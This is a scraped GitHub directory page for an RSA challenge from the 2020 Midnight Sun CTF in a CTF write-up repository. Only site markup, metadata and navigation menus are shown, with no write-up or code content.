src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf/2020-MidnightSun/rsa_yay at master · ironore15/ctf · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C6A2:76EE:1CC8F0D5:1DA604C1:64122184" data-pjax-transient="true"/><meta name="html-safe-nonce" content="a5d835b0e5b7758ba00dca20f08bcea19299a90326b3fb1079296cfe438b6897" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDNkEyOjc2RUU6MUNDOEYwRDU6MURBNjA0QzE6NjQxMjIxODQiLCJ2aXNpdG9yX2lkIjoiMjExNTU3MTQ4NDMyMzg4MTM0OCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="646cbd60d08561240a8d6dbffc6bb3fa4bd023ab1142ec86286125c640c55c86" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:239170367" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/2c62c2fbecae4e45b1ea72e81ea456f4443ede61dacba7623fedb1b0b0fae3a4/ironore15/ctf" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf/2020-MidnightSun/rsa_yay at master · ironore15/ctf" /><meta name="twitter:description" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/2c62c2fbecae4e45b1ea72e81ea456f4443ede61dacba7623fedb1b0b0fae3a4/ironore15/ctf" /><meta property="og:image:alt" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf/2020-MidnightSun/rsa_yay at master · ironore15/ctf" /><meta property="og:url" content="https://github.com/ironore15/ctf" /><meta property="og:description" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/ironore15/ctf git https://github.com/ironore15/ctf.git">
<meta name="octolytics-dimension-user_id" content="37268740" /><meta name="octolytics-dimension-user_login" content="ironore15" /><meta name="octolytics-dimension-repository_id" content="239170367" /><meta name="octolytics-dimension-repository_nwo" content="ironore15/ctf" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="239170367" /><meta name="octolytics-dimension-repository_network_root_nwo" content="ironore15/ctf" />
<link rel="canonical" href="https://github.com/ironore15/ctf/tree/master/2020-MidnightSun/rsa_yay" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
